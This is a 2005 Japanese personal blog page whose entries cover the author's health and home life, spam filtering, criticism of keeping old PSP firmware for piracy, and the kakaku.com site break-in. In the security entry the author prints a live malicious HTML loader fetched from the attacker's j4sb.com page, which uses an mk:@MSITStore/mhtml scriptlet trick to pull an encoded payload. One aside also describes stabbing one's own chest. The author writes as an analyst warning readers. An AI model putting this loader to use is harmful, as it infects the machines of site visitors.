2005年5月16日(月)

近況と色々なヒトのPSPのファームウェアアップデートにまつわる執着とか

エントリーID:1438 [ 日常生活 ] ネットゲーム->FF11/ゲーム機->PSP/インターネット/日常生活

……うーんと、近況を報告すうるとうちの体調は悪いままです。微熱気味と言うかなんと言うか……どうも例のゴミ集積場に蹴りを入れて直径3cmの擦り傷が出来たこと(かさぶたがこの大きさ)か、おしっこを我慢しすぎての膀胱炎なのかも知れないんだけど。
精神的なほうは安定してないってことも無いんだけども……やっぱ嫌な夢を見たり(昔、生まれてから初めて引っ越すまで住んでいた家のこととか)、嫌なこと(嫌いになったヒトのこととか)を思い出すと辛いモンがあります……(>_<)

故障気味なマザーボードを暫定マザーボードに入れ替えた、うちのぱちょこんの復旧作業のほうもイマイチです。

それにしても10メディア対応(11メディア対応もあったけども、増加分が興味の無いxDピクチャーカードだったので10メディアで決定)USBメモリリーダーライターを付けてさらにPSPがあると、こんなにリムーバブルディスクが増えて何がなんだか（＠＿＠）

……実際はこの辺のショートカットあたりからアクセスするので混乱しないけど(苦笑)。エクスプローラのショートカットに /n,/e,/root,ドライブレター(ドライブ名):\ は忘れずに。

逆にキレ病人はこの2～3日は寝ボケ(譫妄？)も少なく、午後以降にゴロゴロしててそのまま昼寝してしまうのも少なくて、妙に体調が良さそうなんだけども……(精神的な面は不明)

そう言えば付き添い通院先であり、うちのキレ病人の看病疲れなどの相談先でもあるクリニックの先生にこの前の付き添い通院でこの「ちはろぐ」のURLを告知したんだけども、忙しい合間を割いて読んで頂けたようです(DEODEOがサービスしているenjoy.ne.jpでアクセスしてるのが間違いないと思う←アクセス解析マニアだから判断できたり。20日の付き添い通院で話があると思うけど)
……20日の付き添い通院までに何かの変化があるか、そして20日の付き添い通院後に変化があるかは不明です。

11日の水曜日にチキンカレー屋さんのマスターとチキンカレー屋さんのサイト立ち上げについて話をしたたら、マスターと話をしていない間にキレ病人が他人任せ風に話をしていたFF11での日曜深夜～早朝の裏世界(デュナミス)へ知り合いと行くためのLS関連サイトを、いきなりキレ病人自身が立ち上げることになったのは驚いたけども……実際の手続きと作業はうちがやった訳だけども……
LSメンバーリスト(「FINAL FANTASY XI - senobeya.com-」。相変わらずパスワードは生記録)やら、YY-BBSの設置はうちがやりました。改造もシタヨ。
掲示板に初期の投稿が無いのはマズいと教えたらやっぱりろくでもないことを書くし……誹謗中傷そのほかを禁止して削除するって話は掲示板の上部に書けば良い事で、書き込みが無ければ掲示板自体を削除するってのも書くべきでは無いことだし(うちも仲間/知り合い用に用意した掲示板とかにはそう書きたいけども……(苦笑)。あまり使って貰えないしネ)
投稿を直させて、掲示板スクリプトの設定ファイルじゃないほうをうちが修正してそれを盛り込んでおきました。
……そしてこれを書いてるこの時間にキレ病人はそのサイトを作る元になった、少人数での裏世界に行っているし……裏世界行ってみたかったナァ……白魔道士のうちは戦闘不能になるだけなんだろうけど。

もし、生活がある程度安定して、FF11を遊べる様になってもすべてまた夢でしょうか……(>_<)。白日夢？(びみょうにえっちな映画が昔あったよーな)

そう言えば全く名前に負けてるPlayOnlineのOCRチーム(Online Community Relationsチーム)から、大量のメールが届いてるけども、PS2版の「フロントミッションオンライン」の不具合というかサーバーメンテの連絡ばっかりで……
……こっちから応援サイトとしての提案その他を連絡しても反応も出来ないチームは「OCRチーム(Online Community Relationsチーム)」とは呼べませんネ。

上でも触れてるうちのぱちょこんの復旧作業の続報に触れるとWebメール機能で溜まってるメールを数えてみたら、受信メール(213)、迷惑メール(267:学習フィルタ)、ゴミ箱(13:受信拒否設定)になってました。ウイルスメールは受信前に削除されてるけども、迷惑メールと受信拒否メールはWebメールでしか弄れないところに保存されてるし……
さらに受信メール213通中の188通を除いたメールは迷惑メールな罠……通常のメールを迷惑メールと判定する確率はゼロにかなり近いけども、数通は通常のメールとしてすり抜けるようで。
うちは接続に利用しているODNのメールボックスから全て☆さくらインターネット☆の「さくらのレンタルサーバ」スタンダードプランのメールアドレスに転送して、ウイルスメールと迷惑メールと受信拒否を分けてるんだけども……サーバースペース+メールスペースで1GBで月500円/年5000円のサービスに負けてるし……
ODNで契約してる送受信メールウイルスチェックサービスは月額210円かかってるんだけど、うちはこれは休止中だし……送信メールでウイルスチェックしてもマトモなメールサーバー経由でウイルスを送るバカなウイルスあるんかなぁ……

また無料で以下のようなサービスが始まるんだけども……
「So-net、件名に[meiwaku]を付加する無料の迷惑メール対策サービス」(ImpressBB)
「So-net、件名に[meiwaku]表記を付加する無料の迷惑メール対策サービス」(ImpressInternet)
「So-net、迷惑メールを自動振り分けしてくれるサービスを無償にて提供開始」(RBB TODAY)
……学習型迷惑メールフィルタを無料でも有料でもサービスしないといってるODNは、既に接続プロバイダとしての価値が無いと思ったほうがマシなんかなぁ……BekkoameやHighwayInternetとか上位プロバイダの回線を借りるしか無くなって、接続会員が迷惑メールを送りまくってるとこみたいに……(>_<)

色々なヒトのPSPのファームウェアアップデートにまつわる執着とかは続きで～

最近、PSPのファームウェアバージョン1.0でしか出来ない怪しいことが流行してるようなんだけども……

うちが見た範囲ではその上で何かを造れるヒトが自己顕示をするためや、自分では何も出来ないけどもその恩恵のおこぼれにあやかりたいヒトが、PSPのファームウェアアップデートを渋ってるようにしか見えなくも無い気がします。そして旧ファームウェア1.0を搭載した中古のPSP本体を買い漁ってるとしか……

PSPが、ゲーム機本体の流通数が少なかったのに違法コピーのゲームが多くなりすぎたドリームキャスト(DC)や、Xboxのようにならないことを祈るばかりです。

旧ファームウェアを解析して見つけた情報を元に作られたソフトウェアが流通しているまでは良いと思うけど(そして楽しくもある)、その上で違法なROMデータを入手して遊ぶのがメインなエミュレーター(稀に手持ちのROMを吸い出してるヒトも居るけど)や、PSP自体のUMDのソフトウェアやビデオ/オーディオソフトをメモリースティックから再生できて、そのデータがアホなP2PソフトやWebサイト経由で配布と入手されたりしたら意味が無く。
UMDゲームソフトウェアやビデオ/オーディオソフトをを吸い出す怪しいソフトを造ったり、PSPの繁栄に対して問題の出るはずであるそれらで吸い出したUMDゲームソフトウェアやビデオ/オーディオソフトをメモリースティック上で実行できる形式で配布したヒトを「神」と崇めてたら意味が無い訳で。

色々考えた挙句、昨日うちはPSPのファームウェアを1.51にアップデートしました。ファームウェア1.0に執着しているヒトと同じにはなりたくないので。
ファームウェア1.5にも、ファームウェア1.0で作成されたデータを再生する機能があるんだろうと思います。

ファームウェア1.51に更新せずに、ファームウェア1.0や1.5で止めているヒトたちは、目の前に大容量メモリースティックPRO Duoさえあれば実行できる市販で3000円～6000円のゲームソフト、2000円～4000円のUMDビデオ/オーディオと同じ内容のファイルがネット上にあったら自分の倫理観で我慢できるのかなと思いますケド……どうですか？

この話題について、トラックバックを送りたいPSPで知り合った知り合いや、全く知らないPSP関連Blog/WebLog/ブログを運営しているヒトにトラックバックを送りたい気持ちはありますけど、ひっそりとここでだけ気持ちを公開しておきます。数名のヒトしか「ちはろぐ」自体と「続きを読む」機能でこの部分を読まないと思うけど。
そしてトラックバックは受け付ける設定にはしません。

……一言。「自分で自分の首を絞めますか？」。自分の胸を刃物で刺すと皮の切れる感触の後に脂か筋肉が切れていく感触があるんだけども、PSPでそう言う遊びをしてて痛みを感じるのカナァ……？

5/19追記
5/17にも書いたけど(ちはろぐ: フロントミッションオンライン(2005年05月19日))
PSP自体は便利で楽しいけども、最近のPSPを取り巻く環境には飽きました。
自分だけが楽しいでは無く、売っている会社も楽しい、買って使っている自分も楽しいって世界のほうが良いです。
想定外な事をやって、PSP対応UMDゲームソフト/UMDビデオ・オーディオソフトの権利を守りきれなさそうなヒトばかりだし……その想定外の穴を潰すファームウェア更新に文句言ってるだけだし。
……生活費を削って、死ぬ気で買ったPSPでこんな思いをしなくてもって思います。

2005年5月16日のこの話題だけを読む/Permlink | [ 日常生活 ] ネットゲームFF11/ゲーム機PSP/インターネット/日常生活 |

気のせい……？？

エントリーID:1439 [ 雑談 ] サイト関係/雑談

「ちはろぐ」は仲間/知り合いには読まれてない/見られてない気がしないでもないので、ここも更新停止しても良いような気がしないでも無く。

……うちはアホなので何か見つけたり思い出す度に何かを書くんだろうケド。

色々書き直したので、この話題の下まで読み直して貰えると幸いでございます。特に仲間/知り合いのヒト達には……

追伸：
特に大した意味は無いんだけども、最近ブラウザからWebサーバー環境変数に渡る HTTP_REFERER を異常な設定にしてるヒトが妙に多いので、そのような設定では日記の画像が表示されないようにしました。結果として、検索エンジンのキャッシュ表示でも画像は表示されません。
……画像非表示型アクセス解析でHTTP_REFERERが無くて、画像表示エラーログに記録されてないアクセスは、未だに懐かしいセキュリティ対策もしくは画像型アクセス解析対策もしくは通信速度向上のために画像表示を切ってるヒトと見て良いのかな……ttp:// で表記されてるURLをコピペで開いて参照元URLは無しで、その後の参照元URLは正常に出力されてて画像は正常に表示されたって可能性もあるけど。
この組み合わせで色々判断できるのでそれなりに対策したいと思います。後、例の dgcircus.as.wakwak.ne.jp 対策って部分もあるけど。

まあ一言で言っとくと、参照元を遮蔽/隠蔽/偽称しないと他人のサイトを見ることが出来ない小心者が嫌いってのもあるんです……どうしてそう記述するか知って無いのか知ってるのかttp:// なんかでURLを紹介して、紹介元のBBS類を追っかけられて文句言われるのが怖いのか～い？不本意な場所や不本意な紹介内容だと、うちはマジに色々やるけどネ……
ちなみに ttp:// などを変換するツールで変換すると参照元URLは作成されますので……故意にその手のツールで正式なリンクに変換してアクセス先に参照元URLを通知するって手もあるネ。

ちなみにうちは文句があるサイトやBlog/WebLog/ブログもttp://で回避したりせず、「ちはろぐ」の話題から直でリンクします(今は自動リンクが無いので、自分でリンク貼ってるけども)
誰かがそのリンクを使って(うちが一回使うけど(苦笑))、アクセス解析をマメに見てればうちが文句があるってのが判るでしょう。
文句があるってのを明示して残さずに、怒ってメールで連絡しても意味が無いし。そして、そんなサイトなんぞは敵でも無く。
……正直に書くとうちの一番の敵は、「キレ病人」と「仲間/知り合い」です。

検索キーワードに「フロントミッションオンライン 改造コード」なんてのも出てきた……みんなズルが好きなんだね。

2005年5月16日のこの話題だけを読む/Permlink | [ 雑談 ] サイト関係/雑談 |

価格com、サイト書き換え＆ウイルス汚染のほぼ正確な情報

エントリーID:1440 [ セキュリティ ] インターネット->セキュリティ/インターネット->ツッコミ

バカなんでまた書いてます。それも数名しか見ていないところに書いても無駄なことを……
5/17の追記あり。

価格.comが侵入とサイト書き換えと一部メールアドレス類を取得されてしまった件についてあまりマトモなことを報道している企業サイトがないんだけども、なぜかITmediaがある程度正確な情報を出してます。
「価格.com経由で拡散したウイルス、Windowsの既知の脆弱性を悪用 - 価格.comへの不正アクセスの詳細は不明だが、結果としてばら撒かれたウイルス自体は、既知のWindowsの脆弱性を悪用するもの。パッチを適用していればリスクは下げられる。」(ITmediaEnterprise)
と言うことで、価格.comが書き換えられた当日の5/11に配布されたWindowsの更新もしくは4月の第2水曜まで程度に配布された、Windows及びInternetExplorerの脆弱性に対するパッチをを自動更新もしくはWindowsUpdateで適用していれば、ウイルス対策ソフトの対応が間に合っていなくてもかなり感染のリスクが減るものだそうで。

「tdiary.ishinao.net - IPAに問い合わせをしてみた (13:20)」によると、価格.comは「Site report for kakaku.com」で見ると、18-Nov-2004からWindows Server 2003上のMicrosoft-IIS/6.0で運営されてたそうで(リンク先の表示は時期が変われば内容も変わります)
現在の「価格.com」のサーバレスポンスを ieHTTPheaders やWeb上ツールの「View HTTP Request and Response Header」などで見ると、ヘッダーに Apache とあり、急遽 Red Hat Linux 上にWebサーバーとして Apache/2.0.40 を構築してお知らせのページを公開したようです。

「価格.comが不正アクセスで閉鎖　ユーザーにウイルス感染のおそれも - 価格.comが不正アクセスを受け、14日から閉鎖している。サイトを媒介にウイルスがばらまかれており、ユーザーは感染した可能性がある。」(ITmediaNews)
「価格.com、不正アクセス事件を受けウイルス対策ソフト「NOD32」体験版を提供 - カカクコムはWebサイトへの不正アクセス事件を受け、「価格.com」上で、ウイルス対策ソフト「NOD32」の体験版ファイルの配布を開始した。」(ITmediaEnterprise)
「「最高レベルのセキュリティが破られた」――カカクコム、不正アクセス事件を説明」(ITmediaNews)

最高のセキュリティ状態だったと言う割にはお知らせ公開以前の環境には穴があったとしか言いようが無く。

……なんというか、ユーザーは価格比較ページを見てネット通販や直接店頭に行くようなことをするんなら、インターネットセキュリティソフト/ウイルス対策ソフトに頼りっきりじゃなくて、Windowsの自動更新やWindowsUpdateをしろと……(苦笑)

そしてその辺の安全性や危険性を記載してない企業系ニュースサイトの情報。
「価格.comが一時閉鎖、不正アクセスでトロイの木馬を仕込まれる - 閲覧したユーザーはウイルス感染の恐れも」(ImpressInternet)
「トレンドマイクロ、価格.comで問題になったウイルスに対応～価格.comではNOD32の体験版を配布」(ImpressInternet)
「「ソフト、ハード、運用の全てを刷新」価格.com、23日をめどに復旧 - 穐田社長「今回の攻撃はレベルの高いものだった」」(ImpressInternet)
「価格.comのウイルスに対応した駆除ツール、トレンドマイクロが公開」(ImpressInternet)
「価格.com、不正アクセスの被害を受け14日から閉鎖」(RBB TODAY)
「価格.com経由でウイルスに感染したユーザ向けに対策ソフトを提供」(RBB TODAY)
「価格.comのトロイの木馬。トレンドマイクロも自動駆除ツールのダウンロード提供」(RBB TODAY)
「価格.comの不正アクセスは原因は解明されたものの、被害規模の把握にはいたらず」(RBB TODAY)
「カカクコム緊急会見、「1週間後に復旧目指す」--手口と影響は調査中」(CNET Japan)

どの脆弱性を利用して閲覧ユーザーのPCに侵入し感染するか、そして既に対策されているのかされていないのかを記載してないって言うだけで、かっこ悪いです……

……まぁ、うちが「ちはろぐ」でこんなことを書いてても誰も安心しないし、役に立つこともないと思うけどネ……(>_<)

5/17追記：
「【特別企画】価格.comクラック対策～可能性は低いが閲覧者はウイルス感染確認を」(ImpressInternet)
「続報：価格.comだけではなかったWeb改ざん、改めて検査と警戒を - 改ざんされた「価格.com」経由で広がったトロイの木馬への対応は進んでいるが、一方で、他のWebサイトでも同様の被害が確認された。十分な警戒が必要だ。」(ITmediaEnterprise)
「価格.com」のサイトだけでは無く、他のサイトでも多数感染して閲覧ユーザーを汚染させる可能性があるので、しっかりWindowsUpdateを行い、ウイルス対策ツールも適切に利用することを勧めています。
……Impress特別企画の最後のほうの画像にこっそり今回の感染原因になるインナーフレームに表示されるサイトのURLが写ってたり……うちは画像と同じくIEの「制限付きサイト」に追加っと……
j4sb.com と言うサイトが怪しいらしく、うちはルーター側その他でもアクセスに行けない制限をかけました。

「静岡新聞社の就職活動支援サイトでも価格.comと同手口のクラック～閲覧者はウイルス感染の可能性も」(ImpressInternet)
「不正アクセス被害が拡大　「WindowsCE FAN」や静岡新聞運営サイトにも - ウイルス拡散を媒介させられた「価格.com」と同様の手口で被害を受けたサイトが相次いでいる。」(ITmediaNews)
静岡新聞の「新卒のかんづめ」は ieHTTPheaders で見ると現在でも Microsoft-IIS/5.0 で運営中。送られてくるクッキー(COOKIE)にプライバシーポリシーのP3Pだったかの記載が無いのも微妙……有効時間設定が無いセッションクッキーなので良いのかもしれないけど。
「WindowsCE FAN」は「Site report for www.wince.ne.jp」で見ると、23-Feb-2005時点でWindows Server 2003上でMicrosoft-IIS/6.0で運営していたと言うのは「価格.com」と同じ条件(リンク先は閲覧時期で変わるので注意)
ieHTTPheaders やWeb上ツール「View HTTP Request and Response Header」で見ると未だにWindows Server 2003のMicrosoft-IIS/6.0上で動作中。
……両サイトとも再びサイト書き換えがある可能性も？
記事ではInternetExplorer以外のブラウザを使うことも薦めてるけど、前に入れっぱなしでバージョンアップしてないFirefoxだったりするとそれはそれで穴があるわけで……最新のFirefox1.04も穴が無いとは言えず……結局どっちも一緒のよーな(苦笑)

「価格.comのウイルス、MMORPG「リネージュ」起動中に活動することが判明」(ImpressInternet)
「価格.comから感染したおそれのあるウイルスはリネージュのキー操作を記録」(RBB TODAY)
今回の「価格.com」騒動で埋め込まれたウィルスは「リネージュ」(1なの2なの？)が起動している間のキー操作/マウス操作/メモリー状態を記録してメールで送信するものらしく。

……追っかけてると面白い……(まるで他人事のように読み上げましょう)

そしてバカは特攻しました……ヒャッホー！オラオラー
「Firefox1.04」+機能拡張「LiveHTTPheaders」(こんなんばっか持ってるねぇ……)で一応(一様ではありません)、JAVAとJAVAscriptを切って
http://www.j4sb.com/count/counter.ap?id=a02 を開くっっっっっっっっっ！(くれぐれもマネして開かないように)
そうすると、
「<HTML oncontextmenu="return false"><HEAD><TITLE></TITLE></HEAD><BODY><SCRIPT LANGUAGE="JavaScript.Encode" src="data/a02.css"></SCRIPT><SCRIPT LANGUAGE="JavaScript">var url=document.location.href;url=url.substring(0,url.lastIndexOf('/'));apk='@MS';bpk='ITS';cpk='tore:mh';dpk='tml:c';epk=':\\.mht!';document.write('<oBJEcT Width=0 Height=0 style="display:none;" type="tExt/x-ScRipTlet" dAtA="mk:'+apk+bpk+cpk+dpk+epk+url+'/data/a02.css::/%23"></OBjECT>');window.status=" ";</SCRIPT></BODY><NOSCRIPT><iframe style="display:none;" src='*.*'></iframe></NOSCRIPT></HTML>」
なんてのを返してくるようで。大文字小文字の混じり具合がお子様ダ……
最初に非可読エンコード済みスクリプトとして読み込んでる data/a02.css は http://www.j4sb.com/count/data/a02.css
途中で文字列演算してさらに文字列演算(単なる文字列連結)をしてるのは、
url=document.location.href;url=url.substring(0,url.lastIndexOf('/'));
の結果は http://www.j4sb.com/count/counter.ap?id=a02 から計算して(親フレームのURLからではない)結果は url=http://www.j4sb.com/count で、
"mk:'+apk+bpk+cpk+dpk+epk+url+'/data/a02.css::/%23"の結果は @MSITStore:mhtml:c\\.mht!http://www.j4sb.com/count/data/a02.css::/%23

……http://www.j4sb.com/count/data/a02.css が Firefox1.04で読もうとも、InternetExplorer6.0SP2で読もうとも404NotFound(それもIIS/6.0)なんですけどー？
逃げやがったか！？つまんな～い！

※忠告：色々詳しくないヒトはこう言う事はしないように。

2005年5月16日のこの話題だけを読む/Permlink | [ セキュリティ ] インターネットセキュリティ/インターネットツッコミ | とらっくばっく(0) |